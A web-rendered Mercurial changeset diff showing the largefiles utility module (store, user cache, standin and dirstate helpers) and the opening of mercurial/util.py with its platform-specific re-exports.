##// END OF EJS Templates
codemod: use pycompat.isposix...
Jun Wu -
r34647:238abf65 default
parent child Browse files
Show More
@@ -1,673 +1,673 b''
1 1 # Copyright 2009-2010 Gregory P. Ward
2 2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
3 3 # Copyright 2010-2011 Fog Creek Software
4 4 # Copyright 2010-2011 Unity Technologies
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 '''largefiles utility code: must not import other modules in this package.'''
10 10 from __future__ import absolute_import
11 11
12 12 import copy
13 13 import hashlib
14 14 import os
15 15 import stat
16 16
17 17 from mercurial.i18n import _
18 18
19 19 from mercurial import (
20 20 dirstate,
21 21 encoding,
22 22 error,
23 23 httpconnection,
24 24 match as matchmod,
25 25 node,
26 26 pycompat,
27 27 scmutil,
28 28 sparse,
29 29 util,
30 30 vfs as vfsmod,
31 31 )
32 32
# Directory name (relative to the repo root) under which standins live.
shortname = '.hglf'
# Same name with a trailing '/', used as the prefix of standin paths.
shortnameslash = shortname + '/'
# Name used for the config section and for store / user-cache directories.
longname = 'largefiles'
36 36
37 37 # -- Private worker functions ------------------------------------------
38 38
def getminsize(ui, assumelfiles, opt, default=10):
    '''Return the minimum largefile size as a float.

    ``opt`` wins when it is set. Otherwise, and only if ``assumelfiles``
    is true, the ``minsize`` config value (falling back to ``default``)
    is used. A falsy value other than None is returned unchanged.

    Aborts when no size could be determined (None) or when the value
    cannot be converted to a number.'''
    size = opt
    if assumelfiles and not size:
        size = ui.config(longname, 'minsize', default=default)
    if size is None:
        raise error.Abort(_('minimum size for largefiles must be specified'))
    if not size:
        return size
    try:
        return float(size)
    except ValueError:
        raise error.Abort(_('largefiles: size must be number (not %s)\n')
                          % size)
52 52
def link(src, dest):
    """Hardlink src to dest; on OSError fall back to an atomic copy.

    The parent directory of dest is created first. When copying, the
    permission bits of src are applied to dest afterwards."""
    util.makedirs(os.path.dirname(dest))
    try:
        util.oslink(src, dest)
        return
    except OSError:
        # hardlinking is not possible here: copy through a temp file instead
        pass
    with open(src, 'rb') as source:
        with util.atomictempfile(dest) as target:
            for piece in util.filechunkiter(source):
                target.write(piece)
    os.chmod(dest, os.stat(src).st_mode)
64 64
def usercachepath(ui, hash):
    '''Return the path of the file with the given hash inside the
    "global" largefiles cache.

    That cache is shared between repositories, saving both download
    bandwidth and storage space.'''
    cachedir = _usercachedir(ui)
    return os.path.join(cachedir, hash)
71 71
def _usercachedir(ui):
    '''Return the directory of the "global" largefiles cache.

    An explicit ``usercache`` config path takes precedence; otherwise a
    per-platform location is derived from the environment. Aborts when
    the platform is unknown or no location can be determined.'''
    configured = ui.configpath(longname, 'usercache', None)
    if configured:
        return configured

    env = encoding.environ
    if pycompat.iswindows:
        appdata = env.get('LOCALAPPDATA', env.get('APPDATA'))
        if appdata:
            return os.path.join(appdata, longname)
    elif pycompat.sysplatform == 'darwin':
        home = env.get('HOME')
        if home:
            return os.path.join(home, 'Library', 'Caches', longname)
    elif pycompat.isposix:
        xdgcache = env.get('XDG_CACHE_HOME')
        if xdgcache:
            return os.path.join(xdgcache, longname)
        home = env.get('HOME')
        if home:
            return os.path.join(home, '.cache', longname)
    else:
        raise error.Abort(_('unknown operating system: %s\n')
                          % pycompat.osname)
    # known platform, but none of the expected variables was usable
    raise error.Abort(_('unknown %s usercache location') % longname)
97 97
def inusercache(ui, hash):
    '''Return true if a file with the given hash exists in the user cache'''
    return os.path.exists(usercachepath(ui, hash))
101 101
def findfile(repo, hash):
    '''Locate the largefile with the given hash and return its store path.

    If the file is only present in the user cache it gets linked into
    the store as a side effect. None is returned when the file is not
    available locally.'''
    ui = repo.ui
    storedpath, found = findstorepath(repo, hash)
    if found:
        ui.note(_('found %s in store\n') % hash)
        return storedpath
    if not inusercache(ui, hash):
        return None
    ui.note(_('found %s in system cache\n') % hash)
    target = storepath(repo, hash)
    link(usercachepath(ui, hash), target)
    return target
116 116
class largefilesdirstate(dirstate.dirstate):
    '''dirstate variant whose entry points normalize paths with
    unixpath() before delegating to the base class.'''

    def __getitem__(self, key):
        parent = super(largefilesdirstate, self)
        return parent.__getitem__(unixpath(key))

    def normal(self, f):
        parent = super(largefilesdirstate, self)
        return parent.normal(unixpath(f))

    def remove(self, f):
        parent = super(largefilesdirstate, self)
        return parent.remove(unixpath(f))

    def add(self, f):
        parent = super(largefilesdirstate, self)
        return parent.add(unixpath(f))

    def drop(self, f):
        parent = super(largefilesdirstate, self)
        return parent.drop(unixpath(f))

    def forget(self, f):
        parent = super(largefilesdirstate, self)
        return parent.forget(unixpath(f))

    def normallookup(self, f):
        parent = super(largefilesdirstate, self)
        return parent.normallookup(unixpath(f))

    def _ignore(self, f):
        # nothing is ever treated as ignored by this dirstate
        return False

    def write(self, tr=False):
        # The ``tr`` argument is deliberately not forwarded:
        # (1) PENDING mode is always disabled, because the lfdirstate
        #     isn't yet managed as a part of the transaction
        # (2) this avoids the develwarn 'use dirstate.write with ....'
        parent = super(largefilesdirstate, self)
        parent.write(None)
139 139
def openlfdirstate(ui, repo, create=True):
    '''
    Build the dirstate object that tracks largefiles.

    Its root is the repo root, while its data lives in the ``largefiles``
    directory below ``repo.vfs``. When ``create`` is true and no dirstate
    file exists there yet, every standin known to the regular dirstate is
    registered via normallookup().
    '''
    repovfs = repo.vfs
    lfopener = vfsmod.vfs(repovfs.join(longname))
    lfdirstate = largefilesdirstate(lfopener, ui, repo.root,
                                    repo.dirstate._validate,
                                    lambda: sparse.matcher(repo))

    # Populating here makes sure the largefiles dirstate gets created on
    # the first meaningful largefiles operation in a new clone.
    if not create or repovfs.exists(repovfs.join(longname, 'dirstate')):
        return lfdirstate

    standinmatcher = getstandinmatcher(repo)
    knownstandins = repo.dirstate.walk(standinmatcher, subrepos=[],
                                       unknown=False, ignored=False)
    if knownstandins:
        repovfs.makedirs(longname)
    for standinfile in knownstandins:
        lfdirstate.normallookup(splitstandin(standinfile))
    return lfdirstate
167 167
def lfdirstatestatus(lfdirstate, repo):
    '''Return the status of lfdirstate with all "unsure" files resolved.

    A file of uncertain state is compared by hash against the standin
    recorded in the working directory parent. It is then appended to
    either the modified or the clean list of the returned status, and
    clean files are also marked normal in lfdirstate.'''
    parentctx = repo['.']
    everything = matchmod.always(repo.root, repo.getcwd())
    unsure, status = lfdirstate.status(everything, subrepos=[],
                                       ignored=False, clean=False,
                                       unknown=False)
    modified = status.modified
    clean = status.clean
    for lfile in unsure:
        try:
            fctx = parentctx[standin(lfile)]
        except LookupError:
            # no standin in the parent revision
            fctx = None
        if fctx and readasstandin(fctx) == hashfile(repo.wjoin(lfile)):
            clean.append(lfile)
            lfdirstate.normal(lfile)
        else:
            modified.append(lfile)
    return status
185 185
def listlfiles(repo, rev=None, matcher=None):
    '''list the largefiles of the working copy (rev is None) or of the
    given changeset; standins unknown to the dirstate are skipped when
    looking at the working copy'''
    if matcher is None:
        matcher = getstandinmatcher(repo)

    inworkingcopy = rev is None
    lfiles = []
    for f in repo[rev].walk(matcher):
        # ignore unknown files in working directory
        if inworkingcopy and repo.dirstate[f] == '?':
            continue
        lfiles.append(splitstandin(f))
    return lfiles
197 197
def instore(repo, hash, forcelocal=False):
    '''Tell whether the store holds a largefile with the given hash'''
    candidate = storepath(repo, hash, forcelocal)
    return os.path.exists(candidate)
201 201
def storepath(repo, hash, forcelocal=False):
    '''Return the location in the repository largefiles store for a file
    with the given hash.

    For a shared repo the path is built from ``repo.sharedpath`` unless
    ``forcelocal`` is set.'''
    if forcelocal or not repo.shared():
        return repo.vfs.join(longname, hash)
    return repo.vfs.reljoin(repo.sharedpath, longname, hash)
208 208
def findstorepath(repo, hash):
    '''Look for the file with the given hash in the local store path(s).

    Returns a ``(path, exists)`` tuple. When the file cannot be found,
    ``path`` is its location in the primary store.
    '''
    # For shared repos, the primary store is in the share source. But for
    # backward compatibility, force a lookup in the local store if it wasn't
    # found in the share source.
    primary = storepath(repo, hash, False)

    if instore(repo, hash):
        return (primary, True)
    if repo.shared() and instore(repo, hash, True):
        return (storepath(repo, hash, True), True)
    return (primary, False)
225 225
def copyfromcache(repo, hash, filename):
    '''Copy the largefile with the given hash from the repo store or the
    system cache to ``filename`` in the working copy.

    Returns True on success. Returns False when the file is in neither
    cache (which should not happen: callers are expected to make sure
    the largefile is available first) or when the copied data does not
    match ``hash``; in the latter case the written file is removed.'''
    wvfs = repo.wvfs
    source = findfile(repo, hash)
    if source is None:
        return False
    wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
    # The write may fail before the file is fully written, but we
    # don't use atomic writes in the working copy.
    with open(source, 'rb') as srcfd:
        with wvfs(filename, 'wb') as destfd:
            gothash = copyandhash(util.filechunkiter(srcfd), destfd)
    if gothash == hash:
        return True
    repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
                 % (filename, source, gothash))
    wvfs.unlink(filename)
    return False
248 248
def copytostore(repo, ctx, file, fstandin):
    '''Copy working-copy ``file`` into the store under the hash recorded
    in standin ``fstandin`` of ``ctx``.

    Does nothing when the store already has that hash; only warns when
    the file is missing from the working copy.'''
    wvfs = repo.wvfs
    hash = readasstandin(ctx[fstandin])
    if instore(repo, hash):
        return
    if not wvfs.exists(file):
        repo.ui.warn(_("%s: largefile %s not available from local store\n") %
                     (file, hash))
        return
    copytostoreabsolute(repo, wvfs.join(file), hash)
259 259
def copyalltostore(repo, node):
    '''Copy every largefile touched by the given revision to the store'''
    ctx = repo[node]
    for standinname in ctx.files():
        lfile = splitstandin(standinname)
        if lfile is None:
            # not a standin
            continue
        if standinname in ctx.manifest():
            copytostore(repo, ctx, lfile, standinname)
268 268
def copytostoreabsolute(repo, file, hash):
    '''Put ``file`` into the store under ``hash``.

    If the user cache already has that hash, the store entry is linked
    from there. Otherwise the file is copied atomically into the store
    and then linked into the user cache.'''
    if inusercache(repo.ui, hash):
        link(usercachepath(repo.ui, hash), storepath(repo, hash))
        return
    dest = storepath(repo, hash)
    util.makedirs(os.path.dirname(dest))
    with open(file, 'rb') as srcf:
        with util.atomictempfile(dest,
                                 createmode=repo.store.createmode) as dstf:
            for chunk in util.filechunkiter(srcf):
                dstf.write(chunk)
    linktousercache(repo, hash)
280 280
def linktousercache(repo, hash):
    '''Make the store's largefile with the given hash available in the
    user cache, by link or copy.'''
    cachepath = usercachepath(repo.ui, hash)
    storefile = storepath(repo, hash)
    link(storefile, cachepath)
286 286
def getstandinmatcher(repo, rmatcher=None):
    '''Build a match object that applies rmatcher to the standin directory.

    Without a (restricting) rmatcher, or when it lists no files, the
    whole standin directory is matched.'''
    wvfs = repo.wvfs

    def ignorebad(f, msg):
        # no warnings about missing files or directories
        return None

    pats = []
    if rmatcher and not rmatcher.always():
        pats = [wvfs.join(shortname, pat) for pat in rmatcher.files()]
    if not pats:
        # no patterns: relative to repo root
        pats = [wvfs.join(shortname)]
    return scmutil.match(repo[None], pats, badfn=ignorebad)
304 304
def composestandinmatcher(repo, rmatcher):
    '''Build a matcher accepting the standins of the files that rmatcher
    accepts. The files listed in rmatcher are passed on as the paths
    specified by the user.'''
    smatcher = getstandinmatcher(repo, rmatcher)
    standinfn = smatcher.matchfn

    def composedmatchfn(f):
        accepted = standinfn(f)
        if accepted:
            accepted = rmatcher.matchfn(splitstandin(f))
        return accepted

    smatcher.matchfn = composedmatchfn
    return smatcher
316 316
def standin(filename):
    '''Build the repo-relative standin path for the given big file.'''
    # Notes:
    # 1) The result is repo-relative on purpose: some callers want an
    #    absolute path, but e.g. addlargefiles passes it to
    #    repo[None].add(). Callers needing an absolute path use
    #    repo.wjoin() themselves.
    # 2) '/' is the separator dirstate always uses, even on Windows, so
    #    the name is converted first in case it came from an external
    #    source (like the command line).
    converted = util.pconvert(filename)
    return shortnameslash + converted
328 328
def isstandin(filename):
    '''Tell whether filename names a big file standin. filename has to
    be in Mercurial's internal (slash-separated) form.'''
    prefix = shortnameslash
    return filename.startswith(prefix)
333 333
def splitstandin(filename):
    '''Return the largefile name for a standin path, or None when
    filename is not inside the standin directory.'''
    # Split on / because that's what dirstate always uses, even on Windows.
    # The local separator is converted first just in case the name comes
    # from an external source (like the command line).
    head, sep, tail = util.pconvert(filename).partition('/')
    if sep and head == shortname:
        return tail
    return None
343 343
def updatestandin(repo, lfile, standin):
    """Hash lfile again and store the result in its standin

    For efficiency the caller has to guarantee that
    "lfutil.standin(lfile) == standin". Aborts when lfile does not
    exist in the working copy.
    """
    file = repo.wjoin(lfile)
    if not repo.wvfs.exists(lfile):
        raise error.Abort(_('%s: file not found!') % lfile)
    hash = hashfile(file)
    executable = getexecutable(file)
    writestandin(repo, standin, hash, executable)
356 356
def readasstandin(fctx):
    '''return the hex hash held by the given standin filectx

    Keeps the way "standin" data is laid out in the storage layer in
    one place.'''
    content = fctx.data()
    return content.strip()
362 362
def writestandin(repo, standin, hash, executable):
    '''write hash (plus a newline) to <repo.root>/<standin>, flagging
    the standin as executable when requested'''
    flags = 'x' if executable else ''
    repo.wwrite(standin, hash + '\n', flags)
366 366
def copyandhash(instream, outfile):
    '''Read bytes from instream (iterable) and write them to outfile,
    computing the SHA-1 hash of the data along the way. Return the hash
    as a hex string.'''
    # Start from an empty hasher instead of seeding it with '': a str seed
    # is rejected by hashlib on Python 3, and hexsha1() creates its hasher
    # the same way.
    hasher = hashlib.sha1()
    for data in instream:
        hasher.update(data)
        outfile.write(data)
    return hasher.hexdigest()
375 375
def hashfile(file):
    '''Return the hex SHA-1 of the file's content, or '' if the path
    does not exist.'''
    if os.path.exists(file):
        with open(file, 'rb') as fd:
            return hexsha1(fd)
    return ''
381 381
def getexecutable(filename):
    '''Return a true value only if filename has the execute bit set for
    user, group and other alike.'''
    mode = os.stat(filename).st_mode
    masked = 0
    for bit in (stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH):
        masked = mode & bit
        if not masked:
            # first missing bit decides; later bits are not inspected
            break
    return masked
387 387
def urljoin(first, second, *arg):
    '''Join URL parts with exactly one '/' inserted at each seam.

    A missing trailing slash on the left side is added, and a single
    leading slash on the right side is dropped.'''
    url = first
    for part in (second,) + arg:
        if not url.endswith('/'):
            url += '/'
        if part.startswith('/'):
            part = part[1:]
        url += part
    return url
400 400
def hexsha1(fileobj):
    """Return the hex-encoded sha1 sum of everything read, chunk by
    chunk, from the given file-like object"""
    digest = hashlib.sha1()
    for piece in util.filechunkiter(fileobj):
        digest.update(piece)
    return digest.hexdigest()
408 408
def httpsendfile(ui, filename):
    '''Wrap filename in an httpconnection.httpsendfile opened with mode
    'rb'.'''
    mode = 'rb'
    return httpconnection.httpsendfile(ui, filename, mode)
411 411
def unixpath(path):
    '''Normalize path into the form used with the lfdirstate.'''
    normalized = os.path.normpath(path)
    return util.pconvert(normalized)
415 415
def islfilesrepo(repo):
    '''Tell whether the repo is a largefile repo.

    True when 'largefiles' is in the repo requirements and the store
    holds a data file whose name contains the standin prefix; otherwise
    the answer depends on whether the largefiles dirstate (opened
    without creating it) yields any entry.'''
    if 'largefiles' in repo.requirements:
        for entry in repo.store.datafiles():
            if shortnameslash in entry[0]:
                return True

    return any(openlfdirstate(repo.ui, repo, False))
423 423
class storeprotonotcapable(Exception):
    '''Exception carrying the ``storetypes`` value it was created with.'''

    def __init__(self, storetypes):
        # kept as a plain attribute for whoever catches the exception
        self.storetypes = storetypes
427 427
def getstandinsstate(repo):
    '''Return a list of (largefile, hash) pairs, one per standin tracked
    by the dirstate.

    The hash is read from the working copy; it is None when reading the
    standin raises IOError.'''
    state = []
    matcher = getstandinmatcher(repo)
    wctx = repo[None]
    tracked = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
                                 ignored=False)
    for fstandin in tracked:
        lfile = splitstandin(fstandin)
        try:
            hash = readasstandin(wctx[fstandin])
        except IOError:
            hash = None
        state.append((lfile, hash))
    return state
441 441
def synclfdirstate(repo, lfdirstate, lfile, normallookup):
    '''Mirror the dirstate entry of lfile's standin into lfdirstate.

    A standin missing from the dirstate counts as state '?' and makes
    lfile get dropped from lfdirstate.'''
    lfstandin = standin(lfile)
    state, mtime = '?', -1
    if lfstandin in repo.dirstate:
        entry = repo.dirstate._map[lfstandin]
        state, mtime = entry[0], entry[3]

    if state == 'n':
        trusted = (not (normallookup or mtime < 0)
                   and repo.wvfs.exists(lfile))
        if trusted:
            lfdirstate.normal(lfile)
        else:
            # state 'n' doesn't ensure 'clean' in this case
            lfdirstate.normallookup(lfile)
    elif state == 'm':
        lfdirstate.normallookup(lfile)
    elif state == 'r':
        lfdirstate.remove(lfile)
    elif state == 'a':
        lfdirstate.add(lfile)
    elif state == '?':
        lfdirstate.drop(lfile)
464 464
def markcommitted(orig, ctx, node):
    '''Call ``orig(node)``, then sync the largefiles dirstate for every
    standin in ``ctx.files()`` and copy the largefiles of ``node`` into
    the store.'''
    repo = ctx.repo()

    orig(node)

    # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
    # because files coming from the 2nd parent are omitted in the latter.
    #
    # "ctx.files()" is the right source for the targets of
    # "synclfdirstate", because such files:
    # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
    # - have to be marked as "n" after commit, but
    # - aren't listed in "repo[node].files()"

    lfdirstate = openlfdirstate(repo.ui, repo)
    for f in ctx.files():
        lfile = splitstandin(f)
        if lfile is None:
            continue
        synclfdirstate(repo, lfdirstate, lfile, False)
    lfdirstate.write()

    # As part of committing, copy all of the largefiles into the cache.
    #
    # Passing "node" rather than "ctx" costs an extra "repo[node]"
    # lookup inside copyalltostore(), but it skips the redundant check
    # for files coming from the 2nd parent, which should already exist
    # in the store at merge time.
    copyalltostore(repo, node)
493 493
def getlfilestoupdate(oldstandins, newstandins):
    '''Return the names of the largefiles whose standin state differs
    between the two given lists.

    Both arguments are iterables of hashable tuples whose first item is
    the largefile name. Each name appears at most once in the result.'''
    changedstandins = set(oldstandins).symmetric_difference(newstandins)
    # A set gives constant-time duplicate checks; the list keeps the
    # order in which names are first encountered.
    seen = set()
    filelist = []
    for entry in changedstandins:
        name = entry[0]
        if name not in seen:
            seen.add(name)
            filelist.append(name)
    return filelist
501 501
def getlfilestoupload(repo, missing, addfunc):
    '''Call ``addfunc(standin, hash)`` for the standins relevant to each
    revision in ``missing``.

    Progress is reported through ``repo.ui.progress`` while iterating.
    For a revision with two parents, the candidate files are extended
    beyond ``ctx.files()`` by comparing the manifests of the revision
    and of both parents.'''
    for i, n in enumerate(missing):
        repo.ui.progress(_('finding outgoing largefiles'), i,
            unit=_('revisions'), total=len(missing))
        # NOTE(review): ``p`` is a context object while node.nullid is
        # presumably a binary node id - confirm this filter behaves as
        # intended.
        parents = [p for p in repo[n].parents() if p != node.nullid]

        # look the revision up with repo.lfstatus switched off, then
        # restore the previous value whatever happens
        oldlfstatus = repo.lfstatus
        repo.lfstatus = False
        try:
            ctx = repo[n]
        finally:
            repo.lfstatus = oldlfstatus

        files = set(ctx.files())
        if len(parents) == 2:
            mc = ctx.manifest()
            mp1 = ctx.parents()[0].manifest()
            mp2 = ctx.parents()[1].manifest()
            # files present in either parent but gone from the merge result
            for f in mp1:
                if f not in mc:
                    files.add(f)
            for f in mp2:
                if f not in mc:
                    files.add(f)
            # files whose manifest entry differs from at least one parent
            for f in mc:
                if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
                    files.add(f)
        for fn in files:
            # only standins that still exist in this revision are reported
            if isstandin(fn) and fn in ctx:
                addfunc(fn, readasstandin(ctx[fn]))
    # a position of None closes the progress topic
    repo.ui.progress(_('finding outgoing largefiles'), None)
533 533
def updatestandinsbymatch(repo, match):
    '''Update standins in the working directory according to specified match

    This returns (possibly modified) ``match`` object to be used for
    subsequent commit process.

    ``match`` may be None, which is handled like a matcher accepting
    everything. In the pattern case the passed matcher has its
    ``_files`` attribute replaced in place, and a shallow copy of it
    (with adjusted ``_files`` and ``matchfn``) is returned.
    '''

    ui = repo.ui

    # Case 1: user calls commit with no specific files or
    # include/exclude patterns: refresh and commit all files that
    # are "dirty".
    if match is None or match.always():
        # Spend a bit of time here to get a list of files we know
        # are modified so we can compare only against those.
        # It can cost a lot of time (several seconds)
        # otherwise to update all standins if the largefiles are
        # large.
        lfdirstate = openlfdirstate(ui, repo)
        dirtymatch = matchmod.always(repo.root, repo.getcwd())
        unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
                                      clean=False, unknown=False)
        modifiedfiles = unsure + s.modified + s.added + s.removed
        lfiles = listlfiles(repo)
        # this only loops through largefiles that exist (not
        # removed/renamed)
        for lfile in lfiles:
            if lfile in modifiedfiles:
                fstandin = standin(lfile)
                if repo.wvfs.exists(fstandin):
                    # this handles the case where a rebase is being
                    # performed and the working copy is not updated
                    # yet.
                    if repo.wvfs.exists(lfile):
                        updatestandin(repo, lfile, fstandin)

        return match

    lfiles = listlfiles(repo)
    # NOTE: this mutates the matcher object passed in by the caller
    match._files = repo._subdirlfs(match.files(), lfiles)

    # Case 2: user calls commit with specified patterns: refresh
    # any matching big files.
    smatcher = composestandinmatcher(repo, match)
    standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
                                  ignored=False)

    # No matching big files: get out of the way and pass control to
    # the usual commit() method.
    if not standins:
        return match

    # Refresh all matching big files. It's possible that the
    # commit will end up failing, in which case the big files will
    # stay refreshed. No harm done: the user modified them and
    # asked to commit them, so sooner or later we're going to
    # refresh the standins. Might as well leave them refreshed.
    lfdirstate = openlfdirstate(ui, repo)
    for fstandin in standins:
        lfile = splitstandin(fstandin)
        # largefiles marked as removed have nothing to refresh
        if lfdirstate[lfile] != 'r':
            updatestandin(repo, lfile, fstandin)

    # Cook up a new matcher that only matches regular files or
    # standins corresponding to the big files requested by the
    # user. Have to modify _files to prevent commit() from
    # complaining "not tracked" for big files.
    match = copy.copy(match)
    origmatchfn = match.matchfn

    # Check both the list of largefiles and the list of
    # standins because if a largefile was removed, it
    # won't be in the list of largefiles at this point
    match._files += sorted(standins)

    actualfiles = []
    for f in match._files:
        fstandin = standin(f)

        # For largefiles, only one of the normal and standin should be
        # committed (except if one of them is a remove). In the case of a
        # standin removal, drop the normal file if it is unknown to dirstate.
        # Thus, skip plain largefile names but keep the standin.
        if f in lfiles or fstandin in standins:
            if repo.dirstate[fstandin] != 'r':
                if repo.dirstate[f] != 'r':
                    continue
            elif repo.dirstate[f] == '?':
                continue

        actualfiles.append(f)
    match._files = actualfiles

    def matchfn(f):
        # files accepted by the original matcher pass unless they are
        # largefiles; everything else passes only if it is one of the
        # matched standins
        if origmatchfn(f):
            return f not in lfiles
        else:
            return f in standins

    match.matchfn = matchfn

    return match
636 636
class automatedcommithook(object):
    '''Stateful hook updating standins only at the 1st commit of resuming

    While committing automatically (rebase, transplant and so on),
    standins in the working directory should not be updated, for
    efficiency: they are expected to be up to date before committing.

    The 1st commit after resuming such an operation (e.g. ``rebase
    --continue``) is the exception, because largefiles may have been
    modified manually in the meantime.
    '''
    def __init__(self, resuming):
        self.resuming = resuming

    def __call__(self, repo, match):
        if not self.resuming:
            return match
        # avoids updating at subsequent commits
        self.resuming = False
        return updatestandinsbymatch(repo, match)
657 657
def getstatuswriter(ui, repo, forcibly=None):
    '''Pick the function used to write largefiles specific status out

    With ``forcibly`` left as ``None`` and a repo carrying the
    ``_largefilesenabled`` attribute, the last element of
    ``repo._lfstatuswriters`` is the "default" writer function.

    In every other case the result is ``ui.status`` when ``forcibly``
    is true, and a function discarding its arguments when it is not.
    '''
    if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
        return repo._lfstatuswriters[-1]
    if forcibly:
        # forcibly WRITE OUT
        return ui.status

    def ignore(*msg, **opts):
        # forcibly IGNORE
        return None
    return ignore
@@ -1,3861 +1,3861 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56
# implementation modules resolved through policy.importmod
base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

# names re-exported from pycompat so callers can reach them through util
cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
stringio = pycompat.stringio
xmlrpclib = pycompat.xmlrpclib

# names re-exported from urllibcompat
httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr
82 82
def isatty(fp):
    """Return fp.isatty(), or False if that raises AttributeError."""
    try:
        result = fp.isatty()
    except AttributeError:
        result = False
    return result
88 88
# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

# Bind ``platform`` to the OS-specific helper module. On Windows, stdout
# is additionally wrapped by that module's winstdout().
if pycompat.iswindows:
    from . import windows as platform
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform
100 100
# translation function
_ = i18n._

# Re-export helpers under platform-neutral names. Most come from the
# ``platform`` module selected above; a few come from os or osutil.
bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
# use osutil's statfiles when it has one, else the platform module's
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

# recvfds and setprocname are optional: they stay undefined in this module
# when osutil does not provide them
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
166 166
# Python compatibility

# unique sentinel used to tell "attribute missing" apart from any real value
_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
# NOTE(review): os.stat_float_times() was deprecated in Python 3.1 and
# removed in Python 3.7 - this call needs revisiting for newer interpreters.
os.stat_float_times(False)
175 175
def safehasattr(thing, attr):
    """Return True if getattr(thing, attr) yields a value.

    The check relies on getattr() with a sentinel default."""
    found = getattr(thing, attr, _notset)
    return found is not _notset
178 178
def bytesinput(fin, fout, *args, **kwargs):
    """Run pycompat.rawinput() with sys.stdin/sys.stdout temporarily
    replaced by encoding.strio() wrappers of fin/fout.

    The answer is passed through encoding.strtolocal(). The previous
    sys.stdin and sys.stdout are always restored."""
    savedin, savedout = sys.stdin, sys.stdout
    try:
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        answer = pycompat.rawinput(*args, **kwargs)
        return encoding.strtolocal(answer)
    finally:
        sys.stdin, sys.stdout = savedin, savedout
186 186
def bitsfrom(container):
    """Return the bitwise OR of all items in container (0 if empty)."""
    mask = 0
    for flag in container:
        mask |= flag
    return mask
192 192
# Python 2.6 still has deprecation warnings enabled by default. We do not
# want to display anything to standard users, so detect whether we are
# running tests and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
